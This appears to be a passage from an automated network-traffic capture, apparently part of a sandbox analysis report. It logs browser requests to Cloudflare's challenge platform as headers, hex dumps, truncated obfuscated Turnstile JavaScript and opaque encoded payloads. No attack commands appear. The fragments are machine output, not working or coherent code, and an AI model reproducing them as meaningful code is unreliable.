                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:32 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 117092
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd8590c3a727a-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC1369INData Raw: 3a 22 50 72 69 76 61 63 79 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 20 66 65 65 64 62 61 63 6b 20 72 65 70 6f 72 74 20 68 61 73 20 62 65 65 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 73 75 62 6d 69 74 74 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e
                                                                                                                                                                                                                                Data Ascii: :"Privacy","feedback_report_output_subtitle":"Your feedback report has been successfully submitted","turnstile_success":"Success%21","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC1369INData Raw: 72 73 65 49 6e 74 28 67 48 28 39 38 37 29 29 2f 31 31 2a 28 70 61 72 73 65 49 6e 74 28 67 48 28 37 37 33 29 29 2f 31 32 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 37 31 37 37 38 37 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 31 32 32 29 5d 2c 65 4d 5b 67 49 28 39 38 33 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 49 28 35 34 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 30 29 7b 69 66 28 68 30 3d 67 49 2c 65 4d 5b 68 30 28 39 38 33 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 30 28 39 38 33 29 5d 3d 21 21 5b 5d 7d 2c 65 55 3d 30 2c 65 4e 5b 67 49 28 31 33 36 31 29 5d 3d 3d 3d 67 49
                                                                                                                                                                                                                                Data Ascii: rseInt(gH(987))/11*(parseInt(gH(773))/12),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,717787),eM=this||self,eN=eM[gI(1122)],eM[gI(983)]=![],eM[gI(542)]=function(h0){if(h0=gI,eM[h0(983)])return;eM[h0(983)]=!![]},eU=0,eN[gI(1361)]===gI
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC1369INData Raw: 6e 20 68 21 3d 3d 69 7d 2c 27 76 45 6f 67 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 78 48 6e 68 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 59 66 65 7a 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 43 50 52 43 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 76 74 6e 7a 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 65 64 63 49 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 65 58 66 76 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 44 64 67 59 74
                                                                                                                                                                                                                                Data Ascii: n h!==i},'vEogX':function(h,i){return h>i},'xHnhI':function(h,i){return h>i},'Yfezq':function(h,i){return i|h},'CPRCk':function(h,i){return h|i},'vtnzw':function(h,i){return h<<i},'edcIs':function(h,i){return i&h},'eXfvU':function(h,i){return h(i)},'DdgYt
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC1369INData Raw: 29 2c 52 3d 7b 7d 2c 52 2e 6c 3d 76 6f 69 64 20 30 2c 47 5b 51 5d 3d 52 3b 65 6c 73 65 20 66 6f 72 28 4d 3d 68 66 28 31 37 31 37 29 5b 68 66 28 35 38 38 29 5d 28 27 7c 27 29 2c 4e 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4d 5b 4e 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 78 5b 4c 5d 3d 45 2b 2b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 44 2d 2d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 68 66 28 31 30 34 33 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 69 66 28 4f 62 6a 65 63 74 5b 68 66 28 31 32 36 39 29 5d 5b 68 66 28 31 31 35 34 29 5d 5b 68 66 28 36 35 31 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 68 66 28 31 35 37 37 29 5d 28
                                                                                                                                                                                                                                Data Ascii: ),R={},R.l=void 0,G[Q]=R;else for(M=hf(1717)[hf(588)]('|'),N=0;!![];){switch(M[N++]){case'0':x[L]=E++;continue;case'1':D--;continue;case'2':D==0&&(D=Math[hf(1043)](2,F),F++);continue;case'3':if(Object[hf(1269)][hf(1154)][hf(651)](B,C)){if(256>C[hf(1577)](
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC1369INData Raw: 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 64 5b 68 66 28 31 30 37 37 29 5d 28 64 5b 68 66 28 36 34 37 29 5d 28 48 2c 31 29 2c 64 5b 68 66 28 31 36 38 39 29 5d 28 4f 2c 31 29 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 68 66 28 31 37 30 39 29 5d 28 64 5b 68 66 28 38 38 33 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 68 66 28 31 30 34 33 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4f 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 7c 64 5b 68 66 28 31 32 31 39 29 5d 28 4f 2c 31 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 66 28 31 37 30 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49
                                                                                                                                                                                                                                Data Ascii: ),s=0;16>s;H=d[hf(1077)](d[hf(647)](H,1),d[hf(1689)](O,1)),I==j-1?(I=0,G[hf(1709)](d[hf(883)](o,H)),H=0):I++,O>>=1,s++);}D--,0==D&&(D=Math[hf(1043)](2,F),F++),delete B[C]}else for(O=x[C],s=0;s<F;H=H<<1|d[hf(1219)](O,1),j-1==I?(I=0,G[hf(1709)](o(H)),H=0):I
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC1369INData Raw: 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 69 28 31 30 34 33 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 68 69 28 31 35 38 39 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 68 69 28 31 31 38 37 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 69 28 31 33 33 37 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 64 5b 68 69 28 37 34 35 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 69 28 31 30 34 33 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 69 28 35 36 30 29 5d
                                                                                                                                                                                                                                Data Ascii: h(M=J){case 0:for(J=0,K=Math[hi(1043)](2,8),F=1;d[hi(1589)](F,K);L=d[hi(1187)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=(d[hi(1337)](0,L)?1:0)*F,F<<=1);s[B++]=e(J),M=d[hi(745)](B,1),x--;break;case 1:for(J=0,K=Math[hi(1043)](2,16),F=1;F!=K;L=H&G,H>>=1,d[hi(560)]
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC1369INData Raw: 79 28 38 37 36 29 5d 5b 68 79 28 39 32 39 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 49 28 31 38 37 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 68 7a 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 29 7b 6b 3d 28 68 7a 3d 67 49 2c 6a 3d 7b 7d 2c 6a 5b 68 7a 28 31 36 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 7a 28 31 32 37 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 7a 28 31 36 37 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 7a 28 31 33 37 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 7a
                                                                                                                                                                                                                                Data Ascii: y(876)][hy(929)]},'*'))},g)},eM[gI(1878)]=function(g,h,i,hz,j,k,l,m,n,o,s,x,B,C,D,E){k=(hz=gI,j={},j[hz(1665)]=function(F,G){return F+G},j[hz(1274)]=function(F,G){return F+G},j[hz(1672)]=function(F,G){return F+G},j[hz(1379)]=function(F,G){return F+G},j[hz
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC1369INData Raw: 2c 68 41 28 31 37 36 37 29 2b 65 2c 6a 5b 68 41 28 31 36 31 37 29 5d 28 68 41 28 31 30 31 35 29 2c 66 29 2c 68 41 28 31 37 36 35 29 2b 67 2c 6a 5b 68 41 28 31 36 31 37 29 5d 28 6a 5b 68 41 28 31 35 33 39 29 5d 2c 4a 53 4f 4e 5b 68 41 28 39 31 35 29 5d 28 68 29 29 5d 5b 68 41 28 31 36 32 31 29 5d 28 6a 5b 68 41 28 31 35 30 35 29 5d 29 2c 65 4d 5b 68 41 28 31 35 34 38 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 43 29 7b 68 43 3d 68 41 2c 65 4d 5b 68 43 28 31 38 37 38 29 5d 28 6d 2c 75 6e 64 65 66 69 6e 65 64 2c 68 43 28 31 34 38 32 29 29 7d 2c 31 30 29 2c 65 4d 5b 68 41 28 31 35 34 38 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 44 29 7b 68 44 3d 68 41 2c 6a 5b 68 44 28 31 34 32 34 29 5d 28 6a 5b 68 44 28 36 39 37 29 5d 2c 6a 5b 68 44 28 31 31 30 34 29 5d 29 3f 65 4d
                                                                                                                                                                                                                                Data Ascii: ,hA(1767)+e,j[hA(1617)](hA(1015),f),hA(1765)+g,j[hA(1617)](j[hA(1539)],JSON[hA(915)](h))][hA(1621)](j[hA(1505)]),eM[hA(1548)](function(hC){hC=hA,eM[hC(1878)](m,undefined,hC(1482))},10),eM[hA(1548)](function(hD){hD=hA,j[hD(1424)](j[hD(697)],j[hD(1104)])?eM
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC1369INData Raw: 5d 3d 66 59 2c 67 36 5b 67 49 28 39 36 33 29 5d 3d 66 58 2c 67 36 5b 67 49 28 36 35 38 29 5d 3d 66 6a 2c 67 36 5b 67 49 28 31 31 37 36 29 5d 3d 66 54 2c 67 36 5b 67 49 28 31 30 33 30 29 5d 3d 66 53 2c 67 36 5b 67 49 28 31 32 37 35 29 5d 3d 66 62 2c 67 36 5b 67 49 28 31 33 34 34 29 5d 3d 66 79 2c 67 36 5b 67 49 28 34 38 32 29 5d 3d 66 7a 2c 67 36 5b 67 49 28 31 31 34 39 29 5d 3d 66 4a 2c 67 36 5b 67 49 28 37 35 38 29 5d 3d 66 49 2c 67 36 5b 67 49 28 31 30 38 31 29 5d 3d 66 48 2c 67 36 5b 67 49 28 31 35 33 36 29 5d 3d 66 47 2c 67 36 5b 67 49 28 31 33 37 36 29 5d 3d 66 72 2c 67 36 5b 67 49 28 31 37 39 34 29 5d 3d 67 35 2c 67 36 5b 67 49 28 31 31 33 37 29 5d 3d 66 73 2c 67 36 5b 67 49 28 34 32 36 29 5d 3d 66 77 2c 67 36 5b 67 49 28 31 31 30 38 29 5d 3d 66 74
                                                                                                                                                                                                                                Data Ascii: ]=fY,g6[gI(963)]=fX,g6[gI(658)]=fj,g6[gI(1176)]=fT,g6[gI(1030)]=fS,g6[gI(1275)]=fb,g6[gI(1344)]=fy,g6[gI(482)]=fz,g6[gI(1149)]=fJ,g6[gI(758)]=fI,g6[gI(1081)]=fH,g6[gI(1536)]=fG,g6[gI(1376)]=fr,g6[gI(1794)]=g5,g6[gI(1137)]=fs,g6[gI(426)]=fw,g6[gI(1108)]=ft


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                117192.168.2.449877104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/520840529:1727987471:dZM8UV-JAT2hGcuf3zG_cR0GPG48srOyHscTUzuMey8/8ccfd84d0859428f/2b545705cb2f7d9 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 3109
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 2b545705cb2f7d9
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/86ghn/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:32 UTC3109OUTData Raw: 76 5f 38 63 63 66 64 38 34 64 30 38 35 39 34 32 38 66 3d 6b 6f 74 57 41 57 49 57 6f 57 76 57 48 46 53 6c 46 53 30 57 46 75 2d 4a 38 64 46 39 53 38 53 42 67 75 6e 6a 78 53 43 33 59 53 78 78 46 6d 53 56 53 34 75 39 4a 37 78 68 50 32 53 6b 57 33 4a 53 68 36 37 38 78 53 63 53 6d 78 2d 67 41 77 76 75 65 53 6b 53 53 65 6f 53 56 57 53 6f 37 53 50 57 49 67 53 71 57 38 36 6d 36 70 4a 57 64 57 79 53 6b 78 2d 7a 52 67 4a 68 6f 53 4b 53 38 61 7a 70 55 69 67 35 52 30 44 41 6c 24 78 2d 42 50 46 53 50 76 53 5a 74 6a 76 53 46 6a 4d 24 55 6a 64 61 33 30 25 32 62 63 48 6a 6e 53 46 43 36 57 2d 46 2d 53 57 54 6e 53 53 42 43 53 2d 68 79 78 53 68 4a 6d 76 57 53 33 6f 53 47 79 75 6f 54 61 56 79 7a 38 78 53 4d 57 50 63 53 2d 7a 31 53 38 7a 6b 42 78 2d 79 53 50 6f 66 53 6e 65 4d
                                                                                                                                                                                                                                Data Ascii: v_8ccfd84d0859428f=kotWAWIWoWvWHFSlFS0WFu-J8dF9S8SBgunjxSC3YSxxFmSVS4u9J7xhP2SkW3JSh678xScSmx-gAwvueSkSSeoSVWSo7SPWIgSqW86m6pJWdWySkx-zRgJhoSKS8azpUig5R0DAl$x-BPFSPvSZtjvSFjM$Ujda30%2bcHjnSFC6W-F-SWTnSSBCS-hyxShJmvWS3oSGyuoTaVyz8xSMWPcS-z1S8zkBx-ySPofSneM
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC737INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:32 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 162776
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: S0B1ukyC+dnKNZBS8ofRwqIdpBWmD0ZDcwQqFnYLm0dl8ddqQ7rAlOFo5wKFEPRH+kz0bOIg1L8bZysYi1Iydm8dP3imcxUt7ZXB4H3uP/BIntGWBH4RHgZQiUgCoMPRH6GpmYnBbd1n4ff6qSw7okTTAj7k5T6CM94JR3S+N+gmviohjvUKfbCPzfYOkevcMCxk/df3t3igK6rsmyr00JpqSpjYrQwK+sVUjsthR0DXx5QlfZMsxQkdn2EepKPwnF639PkBTx/Ahs0KCNhYXFsaD8gLo2RuSufJ+9vOdsyt+jIm1kPmAf4LC6o7G6gK5QiTC+A/7XRANe0Q5+v/wdA88tPSiiFJegLREgVzJLj3EKnd+ovKEu+oS3BGRanE0E+y5Has81s2EUGPrNxmwfc9VB6Aop5KjG+0mVAtstCVlj4h3BFdhzTpAzlq7pHvMIysTHUsV+Ukuvg9U8kBoAoI5Nm2j5ww02EOZFQdh4p2Ky8jOlXuqVKqtJ6muW/oKg==$52jejQKc5AA+c4XY
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd8599f0c0ca6-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC632INData Raw: 74 4a 65 50 74 59 6d 54 75 5a 44 44 72 35 64 33 66 70 43 43 68 70 61 36 6e 4a 79 6b 72 73 4b 71 73 36 50 4c 7a 63 37 42 72 36 48 56 31 61 72 55 30 39 69 74 6f 64 62 57 72 64 37 51 78 74 37 53 31 4e 69 72 35 65 2b 36 72 39 71 37 34 38 53 6e 77 66 4b 76 74 72 62 6d 74 76 65 37 76 74 2f 61 30 50 33 36 42 63 4d 45 42 39 4c 47 2b 64 73 43 7a 63 45 4b 79 38 77 51 45 39 58 52 34 74 50 72 34 78 33 58 37 2b 76 34 37 4e 50 74 45 39 73 48 2b 68 45 6f 49 68 77 49 44 75 59 4a 4a 65 38 48 49 43 59 70 49 53 51 4b 4d 54 59 30 2b 54 55 36 4f 53 67 78 4e 68 59 35 44 6b 55 50 42 54 59 4a 47 54 34 36 53 45 63 4c 51 44 34 30 54 44 42 4c 4b 68 64 54 54 43 6c 62 57 30 30 75 54 31 74 6a 4d 47 4e 46 50 6a 30 69 49 47 42 62 5a 6d 30 39 54 30 39 64 4c 57 45 6d 59 47 70 33 51 30 64
                                                                                                                                                                                                                                Data Ascii: tJePtYmTuZDDr5d3fpCChpa6nJykrsKqs6PLzc7Br6HV1arU09itodbWrd7Qxt7S1Nir5e+6r9q748SnwfKvtrbmtve7vt/a0P36BcMEB9LG+dsCzcEKy8wQE9XR4tPr4x3X7+v47NPtE9sH+hEoIhwIDuYJJe8HICYpISQKMTY0+TU6OSgxNhY5DkUPBTYJGT46SEcLQD40TDBLKhdTTClbW00uT1tjMGNFPj0iIGBbZm09T09dLWEmYGp3Q0d
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC1369INData Raw: 62 58 68 78 68 59 4f 61 57 58 53 4c 62 56 2b 64 58 4a 32 6b 66 47 43 45 70 49 61 6f 6e 61 4b 6f 6e 34 43 77 66 61 4b 6e 67 33 35 6f 71 4c 53 72 63 6f 2b 32 6c 61 6d 30 65 5a 2b 77 6a 4a 71 46 77 4a 36 2b 6c 34 4f 59 6c 5a 71 6e 72 49 61 63 68 4d 61 39 76 71 72 58 74 72 65 59 30 5a 75 6e 32 61 37 4f 6e 4a 7a 5a 76 4c 48 66 30 62 6e 43 74 4f 53 69 72 63 44 74 32 4d 33 79 76 65 61 2f 30 76 44 32 79 2b 4c 59 74 74 4b 31 74 74 62 58 39 2f 6e 35 77 2f 7a 30 41 4e 59 4c 79 50 51 44 2f 51 33 35 2b 68 50 2b 46 4d 34 50 46 78 44 55 43 65 63 4a 2f 42 6a 31 2b 75 30 53 37 79 4c 34 48 2f 33 78 4b 42 76 33 34 69 73 6d 42 75 67 63 4a 41 41 4e 41 53 30 4f 4b 2f 51 70 43 43 73 7a 4f 42 59 63 4e 44 49 51 52 43 38 2f 48 68 67 55 4f 30 63 35 4f 55 5a 4d 41 30 77 76 4c 68 30
                                                                                                                                                                                                                                Data Ascii: bXhxhYOaWXSLbV+dXJ2kfGCEpIaonaKon4CwfaKng35oqLSrco+2lam0eZ+wjJqFwJ6+l4OYlZqnrIachMa9vqrXtreY0Zun2a7OnJzZvLHf0bnCtOSircDt2M3yvea/0vD2y+LYttK1ttbX9/n5w/z0ANYLyPQD/Q35+hP+FM4PFxDUCecJ/Bj1+u0S7yL4H/3xKBv34ismBugcJAANAS0OK/QpCCszOBYcNDIQRC8/HhgUO0c5OUZMA0wvLh0
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC1369INData Raw: 4a 43 58 58 48 4b 4d 62 6e 52 74 70 4b 52 36 64 33 4e 2b 67 49 4f 47 72 4a 68 2b 65 62 43 6d 66 35 2b 71 68 49 68 31 6b 36 36 70 72 36 79 52 73 4c 70 2b 69 35 71 53 6f 61 50 49 76 6f 69 42 66 70 36 6d 72 61 4c 4e 76 4a 48 49 72 4b 2b 53 72 35 6e 59 30 4c 54 46 75 39 57 30 32 74 43 39 72 72 65 2b 33 64 4c 6d 78 38 58 73 75 64 66 6c 36 75 4c 45 7a 65 53 39 38 4d 66 51 32 73 7a 37 79 4e 72 63 30 65 6a 34 38 67 54 36 37 39 41 43 78 76 49 41 37 4e 72 49 44 4f 67 4c 38 4f 55 4b 43 67 34 47 31 77 2f 31 42 76 54 33 45 66 37 33 2b 78 54 69 38 77 50 64 49 78 50 67 45 79 55 6d 36 68 77 4f 4a 4f 30 48 41 78 41 51 4d 50 45 4b 4b 50 55 56 44 41 59 73 2f 42 49 62 4e 52 34 55 48 79 49 45 47 68 6b 56 49 7a 73 46 4c 41 74 49 42 30 74 48 4b 6b 51 78 51 30 45 59 4e 68 56 4a
                                                                                                                                                                                                                                Data Ascii: JCXXHKMbnRtpKR6d3N+gIOGrJh+ebCmf5+qhIh1k66pr6yRsLp+i5qSoaPIvoiBfp6mraLNvJHIrK+Sr5nY0LTFu9W02tC9rre+3dLmx8Xsudfl6uLEzeS98MfQ2sz7yNrc0ej48gT679ACxvIA7NrIDOgL8OUKCg4G1w/1BvT3Ef73+xTi8wPdIxPgEyUm6hwOJO0HAxAQMPEKKPUVDAYs/BIbNR4UHyIEGhkVIzsFLAtIB0tHKkQxQ0EYNhVJ
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC1369INData Raw: 79 44 68 58 64 64 59 59 43 5a 6c 49 70 6f 6e 61 53 69 6d 61 71 44 73 59 75 75 70 4b 47 6d 64 59 57 62 6a 33 71 30 72 33 71 43 6c 62 43 54 73 63 53 52 68 4b 47 57 74 70 37 4e 75 4b 79 65 6d 37 79 76 79 4b 2b 30 74 73 7a 4e 73 72 6d 71 30 63 79 76 76 71 4c 4d 77 74 69 2f 79 4d 62 63 78 39 72 4a 75 75 48 59 7a 75 69 36 76 4f 6e 7a 72 4d 79 76 74 50 48 4d 72 75 72 31 79 73 7a 62 38 2f 66 58 37 62 7a 6f 31 38 48 64 77 77 59 47 78 73 7a 73 35 64 34 4a 78 67 55 4e 34 39 63 55 48 42 66 61 46 64 55 49 47 68 7a 65 45 78 59 56 35 69 67 54 43 39 77 42 49 4f 63 4f 48 65 62 71 44 53 67 65 38 44 49 51 47 53 30 51 50 52 6f 78 4e 6a 41 67 44 78 51 66 4e 42 4d 65 53 51 64 4b 4b 69 6b 6b 50 67 6b 5a 48 67 34 54 53 43 35 50 4e 51 39 49 57 44 42 64 56 46 63 74 58 56 45 66 58
                                                                                                                                                                                                                                Data Ascii: yDhXddYYCZlIponaSimaqDsYuupKGmdYWbj3q0r3qClbCTscSRhKGWtp7NuKyem7yvyK+0tszNsrmq0cyvvqLMwti/yMbcx9rJuuHYzui6vOnzrMyvtPHMrur1yszb8/fX7bzo18HdwwYGxszs5d4JxgUN49cUHBfaFdUIGhzeExYV5igTC9wBIOcOHebqDSge8DIQGS0QPRoxNjAgDxQfNBMeSQdKKikkPgkZHg4TSC5PNQ9IWDBdVFctXVEfX
